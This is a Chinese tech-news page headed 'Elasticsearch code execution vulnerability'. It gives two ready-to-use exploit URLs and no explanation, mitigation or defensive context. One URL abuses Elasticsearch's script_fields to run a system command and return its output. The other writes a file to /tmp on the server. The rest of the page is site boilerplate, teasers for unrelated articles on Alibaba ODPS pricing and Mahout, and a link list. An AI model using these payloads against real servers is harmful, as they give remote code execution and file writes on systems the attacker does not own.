Elasticsearch 代码执行漏洞
http://xxx.com:9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22exp%22:{%22script%22:%22import%20java.util.*;\nimport%20java.io.*;\nString%20str%20=%20\%22\%22;BufferedReader%20br%20=%20new%20BufferedReader(new%20InputStreamReader(Runtime.getRuntime().exec(\%22ifconfig\%22).getInputStream()));StringBuilder%20sb%20=%20new%20StringBuilder();while((str=br.readLine())!=null){sb.append(str);}sb.toString();%22}}}
http://xxx.com:9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22exp%22:{%22script%22:%22import%20java.util.*;\nimport%20java.io.*;\nFile%20f%20=%20new%20File(\%22/tmp/12.txt\%22);if(f.exists()){\%22exists\%22.toString();}BufferedWriter%20bw%20=%20new%20BufferedWriter(new%20OutputStreamWriter(new%20FileOutputStream(f),\%22UTF-8\%22));bw.write(\%221233\%22);bw.flush();bw.close();if(f.exists()){\%22success\%22.toString();}%22}}}

低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。
持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。
转载内容版权归作者及来源网站所有,本站原创内容转载请注明来源。
- 上一篇
ODPS产品商业化模式介绍及价格总览
经过了漫长的公测及等待,阿里云开放数据处理服务(ODPS)计划于2014年7月1日正式商业化售卖,这是阿里云产品大家族中的第一款海量计算产品。有了ODPS后,大家再也不用为数据规模增长带来的数据存储困难、运算时间延长等问题而烦恼了,ODPS可以根据用户的数据规模自动调整集群的存储和计算能力,使您能够专心于数据分析和挖掘,最大化发挥数据的价值。阿里金融、淘宝指数、数据魔方等阿里巴巴关键数据业务的离线处理作业都运行在ODPS上。 欢迎大家下载使用手册来了解和使用ODPS。 同时,欲了解详细的产品计费模型、定价和欠费策略请移步下文: (一)计费规则 ODPS以项目(Project)为单位,对存储、计算和数据下载三个方面分别计费。 存储计费 存储到ODPS的数据,包括表(Table)和资源(Resource)等,会按照其数据容量的大小进行计费,计费周期是一个小时,具体计费公式为: 每小时存储费用 = 存储容量 * 存储价格 价格如下: 计费项 价格 存储价格(元/GB/小时) 0.0008元 说明: 1. 由于ODPS会对用户数据进行压缩存储,计费依据的容量大小是压缩后的数据,因此多数情况下与...
- 下一篇
Mahout学习之Mahout简介、安装、配置、入门程序测试
原文地址:http://blog.csdn.net/aaronhadoop/article/details/24577221 一、Mahout简介 查了Mahout的中文意思——驭象的人,再看看Mahout的logo,好吧,想和小黄象happy地玩耍,得顺便陪陪这位驭象人耍耍了... 附logo: (就是他,骑在象头上的那个Mahout) 步入正文啦: Mahout是一个很强大的数据挖掘工具,是一个分布式机器学习算法的集合,包括:被称为Taste的分布式协同过滤的实现、分类、聚类等。Mahout最大的优点就是基于hadoop实现,把很多以前运行于单机上的算法,转化为了MapReduce模式,这样大大提升了算法可处理的数据量和处理性能。 在Mahout实现的机器学习算法: 算法类 算法名 中文名 分类算法 Logistic Regress
相关文章
文章评论
共有0条评论来说两句吧...
文章二维码
点击排行
推荐阅读
最新文章
- Docker快速安装Oracle11G,搭建oracle11g学习环境
- Docker使用Oracle官方镜像安装(12C,18C,19C)
- CentOS关闭SELinux安全模块
- CentOS7安装Docker,走上虚拟化容器引擎之路
- Docker安装Oracle12C,快速搭建Oracle学习环境
- CentOS6,7,8上安装Nginx,支持https2.0的开启
- Linux系统CentOS6、CentOS7手动修改IP地址
- Hadoop3单机部署,实现最简伪集群
- CentOS7编译安装Cmake3.16.3,解决mysql等软件编译问题
- CentOS7,8上快速安装Gitea,搭建Git服务器